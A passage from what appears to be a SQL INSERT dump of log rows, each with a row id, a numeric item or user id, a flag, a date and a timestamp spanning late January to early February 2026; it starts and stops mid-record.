19:29:10'),(104741,5730,1,'2026-01-28','2026-01-28 20:07:21'),(104742,5712,1,'2026-01-28','2026-01-28 21:02:45'),(104743,5712,1,'2026-01-28','2026-01-28 21:03:38'),(104744,4514,1,'2026-01-28','2026-01-28 21:20:06'),(104745,5457,1,'2026-01-28','2026-01-28 21:28:45'),(104746,5289,1,'2026-01-28','2026-01-28 21:34:03'),(104747,4966,1,'2026-01-28','2026-01-28 21:42:14'),(104748,3247,1,'2026-01-28','2026-01-28 22:10:21'),(104749,4862,1,'2026-01-28','2026-01-28 22:16:38'),(104750,5570,1,'2026-01-28','2026-01-28 22:47:45'),(104751,5492,1,'2026-01-28','2026-01-28 22:54:48'),(104752,5712,1,'2026-01-28','2026-01-28 23:33:19'),(104753,4326,1,'2026-01-29','2026-01-29 01:05:48'),(104754,4681,1,'2026-01-29','2026-01-29 01:27:35'),(104755,5400,1,'2026-01-29','2026-01-29 01:52:46'),(104756,5464,1,'2026-01-29','2026-01-29 01:57:45'),(104757,4529,1,'2026-01-29','2026-01-29 02:06:11'),(104758,5761,1,'2026-01-29','2026-01-29 02:07:53'),(104759,4712,1,'2026-01-29','2026-01-29 02:30:32'),(104760,3056,1,'2026-01-29','2026-01-29 03:09:05'),(104761,5425,1,'2026-01-29','2026-01-29 03:25:56'),(104762,3781,1,'2026-01-29','2026-01-29 03:45:16'),(104763,1604,1,'2026-01-29','2026-01-29 04:01:27'),(104764,5146,1,'2026-01-29','2026-01-29 04:29:38'),(104765,1612,1,'2026-01-29','2026-01-29 04:33:55'),(104766,2296,1,'2026-01-29','2026-01-29 05:20:55'),(104767,4454,1,'2026-01-29','2026-01-29 07:10:25'),(104768,2769,1,'2026-01-29','2026-01-29 08:50:57'),(104769,5573,1,'2026-01-29','2026-01-29 09:27:12'),(104770,5730,1,'2026-01-29','2026-01-29 09:29:34'),(104771,5741,1,'2026-01-29','2026-01-29 09:35:06'),(104772,5046,1,'2026-01-29','2026-01-29 09:38:47'),(104773,3056,1,'2026-01-29','2026-01-29 10:09:56'),(104774,5712,1,'2026-01-29','2026-01-29 10:25:10'),(104775,91,1,'2026-01-29','2026-01-29 10:28:38'),(104776,487,1,'2026-01-29','2026-01-29 10:52:36'),(104777,68,1,'2026-01-29','2026-01-29 10:52:37'),(104778,84,1,'2026-01-29','2026-01-29 10:52:44'),(104779,335,1,'2026-01-29','2026-01-29 10:52:48'),(104780,72,1,'2026-01-29','2026-01-29 10:52:50'),(104781,108,1,'2026-01-29','2026-01-29 10:57:59'),(104782,5280,1,'2026-01-29','2026-01-29 11:13:10'),(104783,5725,1,'2026-01-29','2026-01-29 11:15:12'),(104784,5725,1,'2026-01-29','2026-01-29 11:15:14'),(104785,4722,1,'2026-01-29','2026-01-29 11:56:49'),(104786,5412,1,'2026-01-29','2026-01-29 11:57:55'),(104787,4950,1,'2026-01-29','2026-01-29 12:04:26'),(104788,5157,1,'2026-01-29','2026-01-29 12:15:58'),(104789,1608,1,'2026-01-29','2026-01-29 12:17:29'),(104790,76,1,'2026-01-29','2026-01-29 12:21:57'),(104791,87,1,'2026-01-29','2026-01-29 12:22:51'),(104792,89,1,'2026-01-29','2026-01-29 12:23:27'),(104793,1592,1,'2026-01-29','2026-01-29 12:24:16'),(104794,1584,1,'2026-01-29','2026-01-29 12:25:17'),(104795,91,1,'2026-01-29','2026-01-29 12:25:33'),(104796,5666,1,'2026-01-29','2026-01-29 12:26:26'),(104797,91,1,'2026-01-29','2026-01-29 12:27:24'),(104798,5259,1,'2026-01-29','2026-01-29 12:27:48'),(104799,5712,1,'2026-01-29','2026-01-29 12:58:39'),(104800,3117,1,'2026-01-29','2026-01-29 13:00:48'),(104801,2904,1,'2026-01-29','2026-01-29 13:03:05'),(104802,5428,1,'2026-01-29','2026-01-29 13:21:35'),(104803,5125,1,'2026-01-29','2026-01-29 13:28:38'),(104804,5441,1,'2026-01-29','2026-01-29 13:28:39'),(104805,5472,1,'2026-01-29','2026-01-29 13:34:11'),(104806,5472,1,'2026-01-29','2026-01-29 13:36:53'),(104807,3045,1,'2026-01-29','2026-01-29 13:38:02'),(104808,5712,1,'2026-01-29','2026-01-29 13:41:38'),(104809,72,1,'2026-01-29','2026-01-29 14:03:30'),(104810,5539,1,'2026-01-29','2026-01-29 14:10:19'),(104811,5666,1,'2026-01-29','2026-01-29 14:12:09'),(104812,5712,1,'2026-01-29','2026-01-29 14:13:37'),(104813,4983,1,'2026-01-29','2026-01-29 14:15:38'),(104814,3486,1,'2026-01-29','2026-01-29 14:27:50'),(104815,5461,1,'2026-01-29','2026-01-29 14:27:51'),(104816,5741,1,'2026-01-29','2026-01-29 14:39:48'),(104817,110,1,'2026-01-29','2026-01-29 14:39:58'),(104818,5741,1,'2026-01-29','2026-01-29 14:41:11'),(104819,5741,1,'2026-01-29','2026-01-29 14:41:48'),(104820,5741,1,'2026-01-29','2026-01-29 14:54:12'),(104821,5712,1,'2026-01-29','2026-01-29 15:06:41'),(104822,5712,1,'2026-01-29','2026-01-29 15:10:19'),(104823,5712,1,'2026-01-29','2026-01-29 15:23:15'),(104824,5561,1,'2026-01-29','2026-01-29 15:29:44'),(104825,5561,1,'2026-01-29','2026-01-29 15:29:46'),(104826,3251,1,'2026-01-29','2026-01-29 16:00:21'),(104827,3251,1,'2026-01-29','2026-01-29 16:01:00'),(104828,3251,1,'2026-01-29','2026-01-29 16:02:04'),(104829,89,1,'2026-01-29','2026-01-29 16:07:21'),(104830,5712,1,'2026-01-29','2026-01-29 16:13:10'),(104831,4492,1,'2026-01-29','2026-01-29 16:31:09'),(104832,4960,1,'2026-01-29','2026-01-29 16:34:38'),(104833,5712,1,'2026-01-29','2026-01-29 16:51:31'),(104834,5502,1,'2026-01-29','2026-01-29 17:14:17'),(104835,3781,1,'2026-01-29','2026-01-29 17:21:31'),(104836,5433,1,'2026-01-29','2026-01-29 17:28:16'),(104837,5512,1,'2026-01-29','2026-01-29 17:37:33'),(104838,5457,1,'2026-01-29','2026-01-29 17:37:49'),(104839,4660,1,'2026-01-29','2026-01-29 17:41:32'),(104840,5454,1,'2026-01-29','2026-01-29 17:47:43'),(104841,5400,1,'2026-01-29','2026-01-29 17:52:41'),(104842,4529,1,'2026-01-29','2026-01-29 17:53:39'),(104843,5425,1,'2026-01-29','2026-01-29 17:55:49'),(104844,5412,1,'2026-01-29','2026-01-29 18:10:14'),(104845,5406,1,'2026-01-29','2026-01-29 18:15:41'),(104846,3117,1,'2026-01-29','2026-01-29 18:18:35'),(104847,2904,1,'2026-01-29','2026-01-29 18:19:30'),(104848,5428,1,'2026-01-29','2026-01-29 18:22:56'),(104849,3038,1,'2026-01-29','2026-01-29 18:23:01'),(104850,3045,1,'2026-01-29','2026-01-29 18:34:00'),(104851,4977,1,'2026-01-29','2026-01-29 18:39:48'),(104852,5449,1,'2026-01-29','2026-01-29 18:49:49'),(104853,5436,1,'2026-01-29','2026-01-29 18:49:50'),(104854,72,1,'2026-01-29','2026-01-29 18:50:54'),(104855,5420,1,'2026-01-29','2026-01-29 18:51:48'),(104856,3486,1,'2026-01-29','2026-01-29 19:07:31'),(104857,5461,1,'2026-01-29','2026-01-29 19:07:31'),(104858,5492,1,'2026-01-29','2026-01-29 19:13:32'),(104859,110,1,'2026-01-29','2026-01-29 19:19:57'),(104860,5464,1,'2026-01-29','2026-01-29 19:22:33'),(104861,487,1,'2026-01-29','2026-01-29 19:37:53'),(104862,2904,1,'2026-01-29','2026-01-29 19:38:06'),(104863,1588,1,'2026-01-29','2026-01-29 19:51:27'),(104864,1602,1,'2026-01-29','2026-01-29 20:27:46'),(104865,5712,1,'2026-01-29','2026-01-29 20:49:01'),(104866,5730,1,'2026-01-29','2026-01-29 21:03:00'),(104867,1766,1,'2026-01-29','2026-01-29 21:42:24'),(104868,4950,1,'2026-01-29','2026-01-29 21:43:33'),(104869,4840,1,'2026-01-30','2026-01-30 00:10:44'),(104870,5578,1,'2026-01-30','2026-01-30 00:18:58'),(104871,5464,1,'2026-01-30','2026-01-30 01:03:28'),(104872,4275,1,'2026-01-30','2026-01-30 01:37:34'),(104873,4802,1,'2026-01-30','2026-01-30 01:56:09'),(104874,3498,1,'2026-01-30','2026-01-30 02:17:09'),(104875,5383,1,'2026-01-30','2026-01-30 02:26:07'),(104876,1612,1,'2026-01-30','2026-01-30 02:41:16'),(104877,5472,1,'2026-01-30','2026-01-30 02:58:47'),(104878,4238,1,'2026-01-30','2026-01-30 03:07:10'),(104879,1582,1,'2026-01-30','2026-01-30 03:15:26'),(104880,3777,1,'2026-01-30','2026-01-30 03:27:11'),(104881,4323,1,'2026-01-30','2026-01-30 04:02:12'),(104882,5326,1,'2026-01-30','2026-01-30 04:02:27'),(104883,5762,1,'2026-01-30','2026-01-30 04:04:17'),(104884,570,1,'2026-01-30','2026-01-30 04:12:33'),(104885,3083,1,'2026-01-30','2026-01-30 04:12:40'),(104886,84,1,'2026-01-30','2026-01-30 05:10:03'),(104887,5157,1,'2026-01-30','2026-01-30 05:15:39'),(104888,4542,1,'2026-01-30','2026-01-30 06:06:53'),(104889,5409,1,'2026-01-30','2026-01-30 06:37:28'),(104890,4457,1,'2026-01-30','2026-01-30 07:15:30'),(104891,3764,1,'2026-01-30','2026-01-30 07:17:04'),(104892,5397,1,'2026-01-30','2026-01-30 07:46:37'),(104893,4963,1,'2026-01-30','2026-01-30 07:56:44'),(104894,5601,1,'2026-01-30','2026-01-30 08:11:00'),(104895,5666,1,'2026-01-30','2026-01-30 08:55:53'),(104896,5666,1,'2026-01-30','2026-01-30 08:56:33'),(104897,5472,1,'2026-01-30','2026-01-30 09:10:02'),(104898,3498,1,'2026-01-30','2026-01-30 09:21:31'),(104899,4428,1,'2026-01-30','2026-01-30 09:30:02'),(104900,5712,1,'2026-01-30','2026-01-30 09:53:49'),(104901,91,1,'2026-01-30','2026-01-30 10:31:05'),(104902,1582,1,'2026-01-30','2026-01-30 10:56:52'),(104903,3691,1,'2026-01-30','2026-01-30 11:17:52'),(104904,5741,1,'2026-01-30','2026-01-30 11:24:41'),(104905,4556,1,'2026-01-30','2026-01-30 12:07:37'),(104906,4326,1,'2026-01-30','2026-01-30 12:09:47'),(104907,5741,1,'2026-01-30','2026-01-30 12:32:13'),(104908,1584,1,'2026-01-30','2026-01-30 12:51:10'),(104909,1544,1,'2026-01-30','2026-01-30 12:59:09'),(104910,4950,1,'2026-01-30','2026-01-30 13:29:24'),(104911,3313,1,'2026-01-30','2026-01-30 14:27:28'),(104912,5741,1,'2026-01-30','2026-01-30 14:28:25'),(104913,1766,1,'2026-01-30','2026-01-30 14:40:04'),(104914,4520,1,'2026-01-30','2026-01-30 14:43:37'),(104915,4963,1,'2026-01-30','2026-01-30 14:52:22'),(104916,5725,1,'2026-01-30','2026-01-30 15:35:22'),(104917,4950,1,'2026-01-30','2026-01-30 15:55:27'),(104918,5712,1,'2026-01-30','2026-01-30 15:59:49'),(104919,76,1,'2026-01-30','2026-01-30 16:14:37'),(104920,5741,1,'2026-01-30','2026-01-30 17:20:57'),(104921,5721,1,'2026-01-30','2026-01-30 17:22:32'),(104922,5436,1,'2026-01-30','2026-01-30 18:13:55'),(104923,4660,1,'2026-01-30','2026-01-30 18:54:09'),(104924,5076,1,'2026-01-30','2026-01-30 19:31:36'),(104925,4637,1,'2026-01-30','2026-01-30 20:07:51'),(104926,4368,1,'2026-01-30','2026-01-30 20:08:01'),(104927,5666,1,'2026-01-30','2026-01-30 20:16:14'),(104928,4326,1,'2026-01-30','2026-01-30 20:35:39'),(104929,3777,1,'2026-01-30','2026-01-30 21:11:03'),(104930,2704,1,'2026-01-30','2026-01-30 21:11:22'),(104931,5712,1,'2026-01-30','2026-01-30 21:23:19'),(104932,1612,1,'2026-01-30','2026-01-30 21:37:48'),(104933,5712,1,'2026-01-30','2026-01-30 22:17:04'),(104934,5712,1,'2026-01-30','2026-01-30 22:41:48'),(104935,5712,1,'2026-01-30','2026-01-30 22:44:08'),(104936,2904,1,'2026-01-30','2026-01-30 22:46:19'),(104937,2904,1,'2026-01-30','2026-01-30 22:47:19'),(104938,74,1,'2026-01-30','2026-01-30 22:47:46'),(104939,2704,1,'2026-01-30','2026-01-30 22:50:09'),(104940,4950,1,'2026-01-30','2026-01-30 22:52:08'),(104941,4326,1,'2026-01-31','2026-01-31 00:15:14'),(104942,4950,1,'2026-01-31','2026-01-31 00:18:08'),(104943,4275,1,'2026-01-31','2026-01-31 00:51:16'),(104944,5326,1,'2026-01-31','2026-01-31 00:54:05'),(104945,5649,1,'2026-01-31','2026-01-31 01:14:40'),(104946,3777,1,'2026-01-31','2026-01-31 01:22:39'),(104947,5708,1,'2026-01-31','2026-01-31 01:29:25'),(104948,4542,1,'2026-01-31','2026-01-31 01:35:56'),(104949,5383,1,'2026-01-31','2026-01-31 02:02:53'),(104950,5472,1,'2026-01-31','2026-01-31 02:22:24'),(104951,3083,1,'2026-01-31','2026-01-31 02:35:44'),(104952,5406,1,'2026-01-31','2026-01-31 02:44:40'),(104953,5157,1,'2026-01-31','2026-01-31 02:50:40'),(104954,4323,1,'2026-01-31','2026-01-31 02:50:52'),(104955,570,1,'2026-01-31','2026-01-31 03:02:10'),(104956,1612,1,'2026-01-31','2026-01-31 03:06:13'),(104957,5712,1,'2026-01-31','2026-01-31 03:07:56'),(104958,5146,1,'2026-01-31','2026-01-31 03:30:57'),(104959,72,1,'2026-01-31','2026-01-31 04:31:34'),(104960,2420,1,'2026-01-31','2026-01-31 05:16:21'),(104961,3498,1,'2026-01-31','2026-01-31 06:02:48'),(104962,4529,1,'2026-01-31','2026-01-31 06:03:43'),(104963,4950,1,'2026-01-31','2026-01-31 06:15:38'),(104964,5561,1,'2026-01-31','2026-01-31 06:33:46'),(104965,4363,1,'2026-01-31','2026-01-31 06:37:05'),(104966,4524,1,'2026-01-31','2026-01-31 06:54:35'),(104967,5298,1,'2026-01-31','2026-01-31 07:18:52'),(104968,5717,1,'2026-01-31','2026-01-31 07:27:37'),(104969,5721,1,'2026-01-31','2026-01-31 07:28:55'),(104970,5753,1,'2026-01-31','2026-01-31 07:30:24'),(104971,5749,1,'2026-01-31','2026-01-31 07:31:58'),(104972,5745,1,'2026-01-31','2026-01-31 07:33:55'),(104973,5741,1,'2026-01-31','2026-01-31 07:35:11'),(104974,5721,1,'2026-01-31','2026-01-31 07:36:50'),(104975,5730,1,'2026-01-31','2026-01-31 07:37:08'),(104976,5725,1,'2026-01-31','2026-01-31 07:38:51'),(104977,5721,1,'2026-01-31','2026-01-31 07:39:49'),(104978,5717,1,'2026-01-31','2026-01-31 07:40:33'),(104979,5749,1,'2026-01-31','2026-01-31 07:41:00'),(104980,5717,1,'2026-01-31','2026-01-31 07:42:51'),(104981,5721,1,'2026-01-31','2026-01-31 07:45:15'),(104982,5717,1,'2026-01-31','2026-01-31 07:46:02'),(104983,5725,1,'2026-01-31','2026-01-31 07:46:03'),(104984,5725,1,'2026-01-31','2026-01-31 07:46:40'),(104985,5730,1,'2026-01-31','2026-01-31 07:49:32'),(104986,80,1,'2026-01-31','2026-01-31 08:07:56'),(104987,3056,1,'2026-01-31','2026-01-31 08:10:21'),(104988,3498,1,'2026-01-31','2026-01-31 09:28:27'),(104989,4840,1,'2026-01-31','2026-01-31 10:04:24'),(104990,91,1,'2026-01-31','2026-01-31 10:32:34'),(104991,5712,1,'2026-01-31','2026-01-31 11:38:13'),(104992,5712,1,'2026-01-31','2026-01-31 12:39:00'),(104993,5692,1,'2026-01-31','2026-01-31 13:01:47'),(104994,89,1,'2026-01-31','2026-01-31 13:07:15'),(104995,1870,1,'2026-01-31','2026-01-31 14:07:25'),(104996,1608,1,'2026-01-31','2026-01-31 14:09:03'),(104997,467,1,'2026-01-31','2026-01-31 14:24:42'),(104998,5307,1,'2026-01-31','2026-01-31 14:28:19'),(104999,5397,1,'2026-01-31','2026-01-31 14:32:57'),(105000,1778,1,'2026-01-31','2026-01-31 14:46:41'),(105001,4963,1,'2026-01-31','2026-01-31 15:20:05'),(105002,4963,1,'2026-01-31','2026-01-31 16:49:26'),(105003,5712,1,'2026-01-31','2026-01-31 16:57:36'),(105004,5682,1,'2026-01-31','2026-01-31 17:24:33'),(105005,3226,1,'2026-01-31','2026-01-31 17:25:41'),(105006,5730,1,'2026-01-31','2026-01-31 17:28:45'),(105007,5712,1,'2026-01-31','2026-01-31 18:01:50'),(105008,5712,1,'2026-01-31','2026-01-31 18:05:12'),(105009,1606,1,'2026-01-31','2026-01-31 18:20:13'),(105010,5545,1,'2026-01-31','2026-01-31 18:25:42'),(105011,1602,1,'2026-01-31','2026-01-31 19:13:24'),(105012,5323,1,'2026-01-31','2026-01-31 19:25:39'),(105013,3034,1,'2026-01-31','2026-01-31 21:28:43'),(105014,1747,1,'2026-01-31','2026-01-31 22:25:11'),(105015,5730,1,'2026-01-31','2026-01-31 23:47:20'),(105016,470,1,'2026-01-31','2026-01-31 23:55:17'),(105017,5472,1,'2026-02-01','2026-02-01 00:17:29'),(105018,4862,1,'2026-02-01','2026-02-01 00:46:37'),(105019,4827,1,'2026-02-01','2026-02-01 00:46:54'),(105020,5649,1,'2026-02-01','2026-02-01 00:47:13'),(105021,1614,1,'2026-02-01','2026-02-01 00:48:02'),(105022,5248,1,'2026-02-01','2026-02-01 01:24:03'),(105023,1722,1,'2026-02-01','2026-02-01 03:31:28'),(105024,1722,1,'2026-02-01','2026-02-01 03:31:30'),(105025,5712,1,'2026-02-01','2026-02-01 05:07:19'),(105026,84,1,'2026-02-01','2026-02-01 05:42:05'),(105027,4960,1,'2026-02-01','2026-02-01 06:03:59'),(105028,3056,1,'2026-02-01','2026-02-01 06:06:43'),(105029,4400,1,'2026-02-01','2026-02-01 06:31:00'),(105030,4938,1,'2026-02-01','2026-02-01 06:42:22'),(105031,3109,1,'2026-02-01','2026-02-01 07:25:52'),(105032,5334,1,'2026-02-01','2026-02-01 07:54:58'),(105033,68,1,'2026-02-01','2026-02-01 08:06:32'),(105034,74,1,'2026-02-01','2026-02-01 08:22:30'),(105035,5539,1,'2026-02-01','2026-02-01 08:29:39'),(105036,5539,1,'2026-02-01','2026-02-01 08:29:57'),(105037,3675,1,'2026-02-01','2026-02-01 08:36:01'),(105038,4335,1,'2026-02-01','2026-02-01 08:58:59'),(105039,5662,1,'2026-02-01','2026-02-01 09:43:09'),(105040,1724,1,'2026-02-01','2026-02-01 10:38:42'),(105041,91,1,'2026-02-01','2026-02-01 10:39:35'),(105042,91,1,'2026-02-01','2026-02-01 10:39:55'),(105043,5062,1,'2026-02-01','2026-02-01 11:34:18'),(105044,5062,1,'2026-02-01','2026-02-01 11:34:28'),(105045,4785,1,'2026-02-01','2026-02-01 11:39:32'),(105046,3691,1,'2026-02-01','2026-02-01 11:50:46'),(105047,5428,1,'2026-02-01','2026-02-01 13:00:55'),(105048,5593,1,'2026-02-01','2026-02-01 13:42:46'),(105049,1701,1,'2026-02-01','2026-02-01 15:04:35'),(105050,1718,1,'2026-02-01','2026-02-01 15:12:11'),(105051,5420,1,'2026-02-01','2026-02-01 15:13:11'),(105052,5738,1,'2026-02-01','2026-02-01 15:19:11'),(105053,5730,1,'2026-02-01','2026-02-01 15:24:22'),(105054,5119,1,'2026-02-01','2026-02-01 15:27:16'),(105055,5307,1,'2026-02-01','2026-02-01 15:36:51'),(105056,72,1,'2026-02-01','2026-02-01 15:50:44'),(105057,4341,1,'2026-02-01','2026-02-01 15:55:32'),(105058,5472,1,'2026-02-01','2026-02-01 16:37:13'),(105059,5054,1,'2026-02-01','2026-02-01 16:42:33'),(105060,3034,1,'2026-02-01','2026-02-01 16:51:37'),(105061,5761,1,'2026-02-01','2026-02-01 16:56:38'),(105062,4329,1,'2026-02-01','2026-02-01 16:59:16'),(105063,5712,1,'2026-02-01','2026-02-01 17:40:47'),(105064,5761,1,'2026-02-01','2026-02-01 17:45:45'),(105065,4950,1,'2026-02-01','2026-02-01 17:48:18'),(105066,5735,1,'2026-02-01','2026-02-01 18:09:04'),(105067,5137,1,'2026-02-01','2026-02-01 18:23:32'),(105068,5683,1,'2026-02-01','2026-02-01 18:24:03'),(105069,5761,1,'2026-02-01','2026-02-01 18:27:38'),(105070,5609,1,'2026-02-01','2026-02-01 18:41:38'),(105071,5441,1,'2026-02-01','2026-02-01 18:59:16'),(105072,2558,1,'2026-02-01','2026-02-01 19:26:17'),(105073,5712,1,'2026-02-01','2026-02-01 19:43:02'),(105074,1582,1,'2026-02-01','2026-02-01 20:45:03'),(105075,5639,1,'2026-02-01','2026-02-01 20:49:36'),(105076,4448,1,'2026-02-01','2026-02-01 21:37:13'),(105077,5639,1,'2026-02-01','2026-02-01 22:05:08'),(105078,91,1,'2026-02-01','2026-02-01 22:07:06'),(105079,4966,1,'2026-02-01','2026-02-01 22:15:06'),(105080,5415,1,'2026-02-01','2026-02-01 22:20:29'),(105081,80,1,'2026-02-01','2026-02-01 22:53:16'),(105082,3498,1,'2026-02-01','2026-02-01 23:07:23'),(105083,4845,1,'2026-02-01','2026-02-01 23:26:37'),(105084,1734,1,'2026-02-01','2026-02-01 23:41:36'),(105085,1780,1,'2026-02-02','2026-02-02 00:07:55'),(105086,4944,1,'2026-02-02','2026-02-02 00:13:50'),(105087,5515,1,'2026-02-02','2026-02-02 00:58:37'),(105088,3316,1,'2026-02-02','2026-02-02 01:16:04'),(105089,5310,1,'2026-02-02','2026-02-02 01:24:00'),(105090,5310,1,'2026-02-02','2026-02-02 01:25:53'),(105091,2411,1,'2026-02-02','2026-02-02 01:50:03'),(105092,3004,1,'2026-02-02','2026-02-02 01:50:59'),(105093,4840,1,'2026-02-02','2026-02-02 02:02:43'),(105094,4645,1,'2026-02-02','2026-02-02 02:53:11'),(105095,3777,1,'2026-02-02','2026-02-02 03:49:45'),(105096,3764,1,'2026-02-02','2026-02-02 03:56:48'),(105097,1770,1,'2026-02-02','2026-02-02 04:13:10'),(105098,1728,1,'2026-02-02','2026-02-02 04:13:56'),(105099,4436,1,'2026-02-02','2026-02-02 04:26:17'),(105100,2775,1,'2026-02-02','2026-02-02 04:30:16'),(105101,4587,1,'2026-02-02','2026-02-02 04:35:30'),(105102,4556,1,'2026-02-02','2026-02-02 04:46:29'),(105103,2813,1,'2026-02-02','2026-02-02 06:44:50'),(105104,5409,1,'2026-02-02','2026-02-02 06:56:04'),(105105,3781,1,'2026-02-02','2026-02-02 06:56:17'),(105106,1703,1,'2026-02-02','2026-02-02 07:35:31'),(105107,5749,1,'2026-02-02','2026-02-02 07:57:25'),(105108,5626,1,'2026-02-02','2026-02-02 08:18:08'),(105109,5712,1,'2026-02-02','2026-02-02 08:35:41'),(105110,5712,1,'2026-02-02','2026-02-02 09:47:12'),(105111,5397,1,'2026-02-02','2026-02-02 09:51:08'),(105112,3249,1,'2026-02-02','2026-02-02 10:24:42'),(105113,91,1,'2026-02-02','2026-02-02 10:42:30'),(105114,5457,1,'2026-02-02','2026-02-02 10:52:24'),(105115,4840,1,'2026-02-02','2026-02-02 12:03:46'),(105116,3056,1,'2026-02-02','2026-02-02 12:05:52'),(105117,5735,1,'2026-02-02','2026-02-02 12:24:10'),(105118,4335,1,'2026-02-02','2026-02-02 13:09:39'),(105119,5292,1,'2026-02-02','2026-02-02 13:40:25'),(105120,2411,1,'2026-02-02','2026-02-02 14:21:49'),(105121,5712,1,'2026-02-02','2026-02-02 14:36:48'),(105122,1604,1,'2026-02-02','2026-02-02 14:59:45'),(105123,5598,1,'2026-02-02','2026-02-02 15:30:37'),(105124,5472,1,'2026-02-02','2026-02-02 15:57:12'),(105125,5712,1,'2026-02-02','2026-02-02 16:10:52'),(105126,3498,1,'2026-02-02','2026-02-02 16:11:49'),(105127,5626,1,'2026-02-02','2026-02-02 16:25:21'),(105128,5020,1,'2026-02-02','2026-02-02 16:51:31'),(105129,4950,1,'2026-02-02','2026-02-02 18:24:16'),(105130,5712,1,'2026-02-02','2026-02-02 18:28:42'),(105131,5712,1,'2026-02-02','2026-02-02 18:32:32'),(105132,2503,1,'2026-02-02','2026-02-02 18:33:44'),(105133,5712,1,'2026-02-02','2026-02-02 19:16:28'),(105134,5137,1,'2026-02-02','2026-02-02 19:32:50'),(105135,4326,1,'2026-02-02','2026-02-02 19:36:50'),(105136,4950,1,'2026-02-02','2026-02-02 19:45:41'),(105137,3096,1,'2026-02-02','2026-02-02 20:06:42'),(105138,4688,1,'2026-02-02','2026-02-02 20:24:49'),(105139,5666,1,'2026-02-02','2026-02-02 20:55:32'),(105140,4709,1,'2026-02-02','2026-02-02 22:00:20'),(105141,3226,1,'2026-02-02','2026-02-02 22:17:01'),(105142,1586,1,'2026-02-02','2026-02-02 22:20:40'),(105143,3127,1,'2026-02-02','2026-02-02 23:20:11'),(105144,3486,1,'2026-02-03','2026-02-03 00:08:18'),(105145,5259,1,'2026-02-03','2026-02-03 00:55:19'),(105146,1697,1,'2026-02-03','2026-02-03 00:55:34'),(105147,1697,1,'2026-02-03','2026-02-03 00:55:40'),(105148,5454,1,'2026-02-03','2026-02-03 02:04:10'),(105149,5598,1,'2026-02-03','2026-02-03 02:34:30'),(105150,4944,1,'2026-02-03','2026-02-03 02:55:43'),(105151,80,1,'2026-02-03','2026-02-03 02:55:58'),(105152,1592,1,'2026-02-03','2026-02-03 03:08:53'),(105153,74,1,'2026-02-03','2026-02-03 03:21:27'),(105154,108,1,'2026-02-03','2026-02-03 03:22:38'),(105155,5712,1,'2026-02-03','2026-02-03 03:30:49'),(105156,2411,1,'2026-02-03','2026-02-03 03:54:29'),(105157,1739,1,'2026-02-03','2026-02-03 04:02:29'),(105158,72,1,'2026-02-03','2026-02-03 04:03:33'),(105159,4400,1,'2026-02-03','2026-02-03 04:43:13'),(105160,68,1,'2026-02-03','2026-02-03 04:58:31'),(105161,110,1,'2026-02-03','2026-02-03 05:08:34'),(105162,4870,1,'2026-02-03','2026-02-03 05:15:21'),(105163,3727,1,'2026-02-03','2026-02-03 05:36:25'),(105164,468,1,'2026-02-03','2026-02-03 06:02:39'),(105165,74,1,'2026-02-03','2026-02-03 06:07:21'),(105166,3124,1,'2026-02-03','2026-02-03 06:13:18'),(105167,2609,1,'2026-02-03','2026-02-03 06:28:51'),(105168,5712,1,'2026-02-03','2026-02-03 06:29:37'),(105169,5712,1,'2026-02-03','2026-02-03 06:29:40'),(105170,68,1,'2026-02-03','2026-02-03 06:43:42'),(105171,91,1,'2026-02-03','2026-02-03 07:15:35'),(105172,1596,1,'2026-02-03','2026-02-03 07:22:07'),(105173,5712,1,'2026-02-03','2026-02-03 08:06:00'),(105174,5157,1,'2026-02-03','2026-02-03 08:10:08'),(105175,5692,1,'2026-02-03','2026-02-03 08:25:26'),(105176,5343,1,'2026-02-03','2026-02-03 08:41:45'),(105177,3056,1,'2026-02-03','2026-02-03 10:04:27'),(105178,3282,1,'2026-02-03','2026-02-03 10:13:00'),(105179,80,1,'2026-02-03','2026-02-03 10:24:55'),(105180,91,1,'2026-02-03','2026-02-03 10:45:45'),(105181,5712,1,'2026-02-03','2026-02-03 11:56:42'),(105182,1730,1,'2026-02-03','2026-02-03 12:04:47'),(105183,3694,1,'2026-02-03','2026-02-03 12:23:23'),(105184,4950,1,'2026-02-03','2026-02-03 13:11:18'),(105185,4930,1,'2026-02-03','2026-02-03 13:12:34'),(105186,4963,1,'2026-02-03','2026-02-03 13:13:18'),(105187,4960,1,'2026-02-03','2026-02-03 13:13:56'),(105188,5472,1,'2026-02-03','2026-02-03 13:33:41'),(105189,5712,1,'2026-02-03','2026-02-03 13:52:13'),(105190,80,1,'2026-02-03','2026-02-03 13:54:53'),(105191,80,1,'2026-02-03','2026-02-03 14:01:12'),(105192,5757,1,'2026-02-03','2026-02-03 14:21:12'),(105193,5757,1,'2026-02-03','2026-02-03 14:21:13'),(105194,5757,1,'2026-02-03','2026-02-03 15:09:56'),(105195,4587,1,'2026-02-03','2026-02-03 15:27:24'),(105196,5428,1,'2026-02-03','2026-02-03 15:30:40'),(105197,5730,1,'2026-02-03','2026-02-03 15:30:49'),(105198,1588,1,'2026-02-03','2026-02-03 16:11:04'),(105199,80,1,'2026-02-03','2026-02-03 16:11:31'),(105200,80,1,'2026-02-03','2026-02-03 16:11:36'),(105201,3781,1,'2026-02-03','2026-02-03 16:16:14'),(105202,4551,1,'2026-02-03','2026-02-03 16:24:21'),(105203,91,1,'2026-02-03','2026-02-03 17:12:12'),(105204,4520,1,'2026-02-03','2026-02-03 17:31:33'),(105205,1751,1,'2026-02-03','2026-02-03 17:32:07'),(105206,4709,1,'2026-02-03','2026-02-03 17:33:58'),(105207,4941,1,'2026-02-03','2026-02-03 19:20:55'),(105208,3267,1,'2026-02-03','2026-02-03 19:40:17'),(105209,5397,1,'2026-02-03','2026-02-03 19:43:25'),(105210,5397,1,'2026-02-03','2026-02-03 19:43:26'),(105211,1751,1,'2026-02-03','2026-02-03 20:37:49'),(105212,2704,1,'2026-02-03','2026-02-03 21:12:54'),(105213,4950,1,'2026-02-03','2026-02-03 21:13:54'),(105214,2813,1,'2026-02-03','2026-02-03 21:18:50'),(105215,5363,1,'2026-02-03','2026-02-03 21:31:02'),(105216,5712,1,'2026-02-03','2026-02-03 22:03:39'),(105217,3498,1,'2026-02-03','2026-02-03 22:05:19'),(105218,4840,1,'2026-02-03','2026-02-03 22:15:00'),(105219,5298,1,'2026-02-03','2026-02-03 22:51:47'),(105220,474,1,'2026-02-03','2026-02-03 23:32:55'),(105221,473,1,'2026-02-03','2026-02-03 23:33:00'),(105222,5570,1,'2026-02-03','2026-02-03 23:43:16'),(105223,3781,1,'2026-02-04','2026-02-04 00:24:29'),(105224,5406,1,'2026-02-04','2026-02-04 01:25:27'),(105225,5769,1,'2026-02-04','2026-02-04 